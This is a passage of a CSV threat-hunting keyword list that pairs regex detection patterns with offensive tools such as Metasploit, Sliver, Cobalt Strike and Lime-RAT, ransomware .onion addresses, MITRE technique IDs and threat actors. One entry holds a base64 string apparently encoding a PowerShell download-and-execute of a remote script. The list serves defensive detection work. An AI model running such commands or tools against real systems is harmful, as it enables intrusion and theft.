T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34029" "*apt-get install -y --force-yes kali-archive-keyring && *",".{0,1000}apt\-get\sinstall\s\-y\s\-\-force\-yes\skali\-archive\-keyring\s\&\&\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","34031" "*apt-get -y install tor *",".{0,1000}apt\-get\s\-y\sinstall\stor\s.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","34032" "*APTortellini/unDefender*",".{0,1000}APTortellini\/unDefender.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","34033" "*APTSimulator*",".{0,1000}APTSimulator.{0,1000}","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. 
extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","N/A","10","2570","439","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z","34034" "*apvc24autvavxuc6.onion*",".{0,1000}apvc24autvavxuc6\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34035" "*apvc24autvavxuc6.onion.cab*",".{0,1000}apvc24autvavxuc6\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34036" "*apvc24autvavxuc6.onion.city*",".{0,1000}apvc24autvavxuc6\.onion\.city.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34037" "*apvc24autvavxuc6.onion.to*",".{0,1000}apvc24autvavxuc6\.onion\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34038" "*apypykatz.py*",".{0,1000}apypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - 
TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","34039" "*AQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkg*",".{0,1000}AQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkg.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","34040" "*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*",".{0,1000}aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","34041" "*archerysec*",".{0,1000}archerysec.{0,1000}","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. 
The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Framework","https://github.com/archerysec/archerysec","1","0","N/A","N/A","N/A","10","2344","512","2024-10-08T12:39:37Z","2017-12-04T12:42:54Z","34042" "*archive-*.kali.org/*",".{0,1000}archive\-.{0,1000}\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","34043" "*archive.torproject.org*",".{0,1000}archive\.torproject\.org.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","34044" "*ArchStrike*",".{0,1000}ArchStrike.{0,1000}","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34045" "*ares.py runserver*",".{0,1000}ares\.py\srunserver.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","34046" "*ares-master.zip*",".{0,1000}ares\-master\.zip.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","34047" "*arget13/DDexec*",".{0,1000}arget13\/DDexec.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","1","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","34048" "*ArgFuscator.net/archive/refs/heads/*",".{0,1000}ArgFuscator\.net\/archive\/refs\/heads\/.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","34049" "*ArgFuscator.net-main*",".{0,1000}ArgFuscator\.net\-main.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","34050" "*Args_Invoke_Kerberoast*",".{0,1000}Args_Invoke_Kerberoast.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","34051" "*ArgusCrawler/1.0*",".{0,1000}ArgusCrawler\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - 
T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","34052" "*ArgusDataLeakChecker/1.0*",".{0,1000}ArgusDataLeakChecker\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","34053" "*Argus-Scanner/1.0*",".{0,1000}Argus\-Scanner\/1\.0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#useragent","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","34054" "*ARME Attack: Not Running!*",".{0,1000}ARME\sAttack\:\sNot\sRunning!.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","34055" "*armitage.exe*",".{0,1000}armitage\.exe.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","34056" "*armory install *",".{0,1000}armory\sinstall\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34057" "*armory install .net-execute*",".{0,1000}armory\sinstall\s\.net\-execute.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34058" "*armory install .net-pivot*",".{0,1000}armory\sinstall\s\.net\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - 
TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34059" "*armory install .net-recon*",".{0,1000}armory\sinstall\s\.net\-recon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34060" "*armory install situational-awareness*",".{0,1000}armory\sinstall\ssituational\-awareness.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34061" "*armory install windows-bypass*",".{0,1000}armory\sinstall\swindows\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 
- TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34062" "*armory install windows-pivot*",".{0,1000}armory\sinstall\swindows\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34063" "*Arno0x/DBC2*",".{0,1000}Arno0x\/DBC2.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","34064" "*Arno0x/DNSExfiltrator*",".{0,1000}Arno0x\/DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","34065" "*Arno0x/EmbedInHTML*",".{0,1000}Arno0x\/EmbedInHTML.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as resource. along with an automatic download routine simulating a user clicking on the embedded resource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","34066" "*Arno0x/NtlmRelayToEWS*",".{0,1000}Arno0x\/NtlmRelayToEWS.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","34067" "*Arno0x/WebDavC2*",".{0,1000}Arno0x\/WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actual C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","34068" "*arp.spoof on*",".{0,1000}arp\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34069" "*arp.spoof.*",".{0,1000}arp\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34070" "*arp.spoof.targets*",".{0,1000}arp\.spoof\.targets.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34071" 
"*arp_mitm.py*",".{0,1000}arp_mitm\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","34072" "*arp_spoof.*",".{0,1000}arp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34073" "*arpspoof -i *",".{0,1000}arpspoof\s\-i\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","34074" "*ArpSpoofer*",".{0,1000}ArpSpoofer.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","34075" "*arpspoofing.py *",".{0,1000}arpspoofing\.py\s.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Sniffing 
& Spoofing","https://github.com/luijait/arpspoofing","1","0","N/A","network exploitation tool","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z","34076" "*Arsenal needs TIOCSTI enable for running*",".{0,1000}Arsenal\sneeds\sTIOCSTI\senable\sfor\srunning.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34077" "*arsenal v* - Pentest command launcher*",".{0,1000}arsenal\sv.{0,1000}\s\-\sPentest\scommand\slauncher.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34078" "*arsenal_kit.cna*",".{0,1000}arsenal_kit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34079" "*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","34080" "*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - 